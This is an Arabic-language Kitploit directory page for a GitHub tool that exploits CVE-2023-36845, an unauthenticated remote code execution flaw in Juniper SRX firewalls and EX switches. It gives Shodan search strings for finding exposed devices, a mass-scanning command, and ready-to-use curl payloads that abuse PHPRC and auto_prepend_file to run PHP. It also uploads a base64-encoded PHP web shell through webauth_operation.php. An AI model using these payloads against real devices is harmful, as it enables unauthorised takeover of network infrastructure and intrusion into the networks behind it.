Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kljunowsky/cve-2023-36845
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubkljunowsky/cve-2023-36845

CVE-2023-36845

جدران الحماية Juniper CVE-2023-36845 - RCE

عرض المستودع
5513منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-36845

الوصف

يمثل CVE-2023-36845 ثغرة بارزة في التلاعب بمتغيرات بيئة PHP تؤثر على جدران حماية Juniper SRX ومفاتيح EX. على الرغم من أن Juniper صنفت هذه الثغرة على أنها متوسطة الخطورة، إلا أننا في هذا المقال سنوضح كيف يمكن استغلال هذه الثغرة الواحدة لتنفيذ تعليمات برمجية عن بُعد دون مصادقة.

البحث - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
image
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
image

الاستخدام 🛠

الكشف

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

الخيار 1

من الممكن استخدام أي غلاف بروتوكول مع auto_prepend_file. الخيار الأنسب لهذه العملية هو بروتوكول data://، الذي يسمح بتوفير "الملف الثانوي" مباشرة. فيما يلي تمثيل متطور لهذا الاستغلال، الذي ينفذ <? phpinfo(); ?> المضمنة داخل مخطط data://:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

تنفيذ أمر whoami

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

الخيار 2

رفع ملف

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

المعلمات 🧰

المعلمةالوصفالنوع
--file / -fملف الأهداف المدخلةملف
-oملف الإخراجملف

تواصل معي 📇

LinkedIn - Milan Jovic

تنزيل الأداة